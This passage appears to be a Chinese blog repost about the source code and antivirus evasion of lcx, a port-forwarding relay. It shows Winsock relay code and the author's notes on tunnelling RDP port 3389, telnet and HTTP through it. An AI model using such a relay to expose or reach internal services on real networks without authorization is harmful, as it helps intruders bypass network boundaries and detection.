sockfd1;sock.fd2 = sockfd2;//創建線程DWORD dwThreadID;HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) {TerminateThread(hThread, 0);return;}Sleep(1000);printf("[+] CreateThread OK!\r\n\n");} }//服務器轉發數據 void transmitdata(LPVOID data) {//解析參數(兩個socket句柄)SOCKET fd1, fd2;transocket *sock;sock = (transocket *)data;fd1 = sock->fd1;fd2 = sock->fd2;//準備采用select模型fd_set readfd,writefd;char read_in1[MAXSIZE],send_out1[MAXSIZE];char read_in2[MAXSIZE],send_out2[MAXSIZE];struct sockaddr_in client1,client2;char host1[20],host2[20];int port1=0,port2=0;char tmpbuf[100];memset(host1,0,20);memset(host2,0,20);memset(tmpbuf,0,100);int structsize1 = sizeof(struct sockaddr);int structsize2 = sizeof(struct sockaddr);//獲取第一客戶端信息if(getpeername(fd1, (struct sockaddr *)&client1, &structsize1)<0){strcpy(host1, "fd1");}else{ strcpy(host1, inet_ntoa(client1.sin_addr));port1=ntohs(client1.sin_port);}//獲取第二客戶端信息if(getpeername(fd2,(struct sockaddr *)&client2,&structsize2)<0){strcpy(host2,"fd2");}else{ strcpy(host2,inet_ntoa(client2.sin_addr));port2=ntohs(client2.sin_port);}//輸出兩個客戶端信息makelog(true,"建立數據轉發走向(%s:%d <-> %s:%d)", host1, port1, host2, port2);//最大檢測數目int maxfd = max(fd1,fd2)+1;//設置檢測超時struct timeval timeset;timeset.tv_sec=TIMEOUT; //超時秒數timeset.tv_usec=0; //超時微秒//位模式清零memset(send_out1,0,MAXSIZE);memset(send_out2,0,MAXSIZE);//可讀長度int totalread1=0,totalread2=0;while(1){//采用select異步模型FD_ZERO(&readfd);FD_ZERO(&writefd);//添加到fd集合FD_SET((UINT)fd1, &readfd);FD_SET((UINT)fd1, &writefd);FD_SET((UINT)fd2, &readfd);FD_SET((UINT)fd2, &writefd);//第一個參數會被系統忽略掉int result=select(maxfd, &readfd, &writefd, NULL, ×et);if((result<0) && (errno!=EINTR)){//程序出錯makelog(true,"select函數出錯");break;}else if(result==0){//等待超時makelog(true,"select函數等待超時");continue;}//fd1可讀if(FD_ISSET(fd1, &readfd)){//只要可讀,一次即可讀取完整,無需while循環//if(totalread1) {memset(read_in1,0,MAXSIZE);int read1=recv(fd1, read_in1, MAXSIZE-totalread1, 0); if((read1==SOCKET_ERROR) || (read1==0)){makelog(true,"讀取fd1出錯");break;}//改變fd1的發送緩沖區和他的大小(接了就要發嘛)memcpy(send_out1+totalread1, read_in1, read1);totalread1+=read1;//日志輸出makelog(true,"fd1成功在地址:%16s:%d上面讀取%d字節", host1, port1, read1);}}//fd2可寫if(FD_ISSET(fd2, &writefd)){int err=0;int sendcount1=0;//發送的話可能一次發不完(數據包過大)while(totalread1>0){int send1=send(fd2, send_out1+sendcount1, totalread1, 0);//出錯檢查if(send1==0) break;if((send1<0) && (errno!=EINTR)){makelog(true,"寫入fd2出錯");err=1;break;}if((send1<0) && (errno==ENOSPC)) break;//改變緩沖區大小sendcount1 += send1;totalread1 -= send1;//日志輸出makelog(true,"fd2成功在地址:%16s:%d上面發送%d字節", host2, port2, send1);}//檢驗出錯if(err==1) break;//如果發送了數據,并且沒有發送干凈if((totalread1>0) && (sendcount1>0)){//理論上下面兩行永遠不會執行memcpy(send_out1,send_out1+sendcount1,totalread1);memset(send_out1+totalread1,0,MAXSIZE-totalread1);}else{memset(send_out1,0,MAXSIZE);}}//fd2可讀if(FD_ISSET(fd2, &readfd)){//只要可讀,一次即可讀取完整,無需while循環//if(totalread2){memset(read_in2,0,MAXSIZE);int read2=recv(fd2,read_in2,MAXSIZE-totalread2, 0); if(read2==0)break;if((read2<0) && (errno!=EINTR)){makelog(true,"讀取fd1出錯");break;}//接了就立即發出去memcpy(send_out2+totalread2,read_in2,read2);totalread2+=read2;//日志輸出makelog(true,"fd1成功在地址:%16s:%d上面讀取%d字節", host2, port2, read2); }}//fd1可寫if(FD_ISSET(fd1, &writefd)){int err2=0;int sendcount2=0;while(totalread2>0){int send2=send(fd1, send_out2+sendcount2, totalread2, 0);if(send2==0)break;if((send2<0) && (errno!=EINTR)){makelog(true,"寫入fd1出錯");err2=1;break;}if((send2<0) && (errno==ENOSPC)) break;sendcount2+=send2;totalread2-=send2;//日志輸出makelog(true,"fd1成功在地址:%16s:%d上面發送%d字節", host1, port1, send2);}if(err2==1) break;if((totalread2>0) && (sendcount2 > 0)){memcpy(send_out2, send_out2+sendcount2, totalread2);memset(send_out2+totalread2, 0, MAXSIZE-totalread2);}else{memset(send_out2,0,MAXSIZE);}}Sleep(5);}//關閉socketclosesocket(fd1);closesocket(fd2);makelog(true,"成功關閉掉兩個socket,fd1,fd2"); }//關閉套接字 void closeallfd() {for(int i=3; i<256; i++){closesocket(i); }makelog(true,"成功關閉所有socket");if(fp != NULL) {fclose(fp);} }//創建一個套接字 int create_socket() {int sockfd;sockfd=socket(AF_INET,SOCK_STREAM,0);if(sockfd<0){makelog(true,"socket函數出錯");return(0);}return(sockfd); }//創建一個服務器 int create_server(int sockfd,int port) {//地址聲明struct sockaddr_in srvaddr;memset(&srvaddr, 0, sizeof(struct sockaddr));srvaddr.sin_port=htons(port);srvaddr.sin_family=AF_INET;srvaddr.sin_addr.s_addr=htonl(INADDR_ANY);//端口復用int on=1;setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR, (char*)&on,sizeof(on)); //協議綁定if(bind(sockfd, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr))<0){makelog(true,"bind函數出錯");return(0);}//進行監聽if(listen(sockfd,CONNECTNUM)<0){makelog(true,"listen函數出錯");return(0);}return(1); }//嘗試連接次數 int tryConnectServer = 0;//客戶端連接到服務器 int client_connect(int sockfd, char* server, int port) {tryConnectServer ++;struct sockaddr_in cliaddr;struct hostent *host;if(!(host=gethostbyname(server))){makelog(true,"無法獲取目標主機相關信息 IP:%s", server);return(0);}memset(&cliaddr, 0, sizeof(struct sockaddr));cliaddr.sin_family=AF_INET;cliaddr.sin_port=htons(port);cliaddr.sin_addr=*((struct in_addr *)host->h_addr);if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0){makelog(true,"連接到公網失敗 %s:%d-----%d次", server, port, tryConnectServer);return(0);}return(1); }
實地測試的時候發現,3389映射成功,可以連接上但是屏幕是黑的不知道怎么回事,我試了試從網上下載來的lcx.exe也是黑屏
不知道怎么回事,還有就是ftp協議映射失敗,telnet協議和http協議都映射正常,至于前面面兩個為甚映射失敗有機會我接著研究吧。
總結
以上是生活随笔為你收集整理的lcx源代码以及免杀的研究的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 详细解析SELECT模型
- 下一篇: 关于sql中的with(nolock)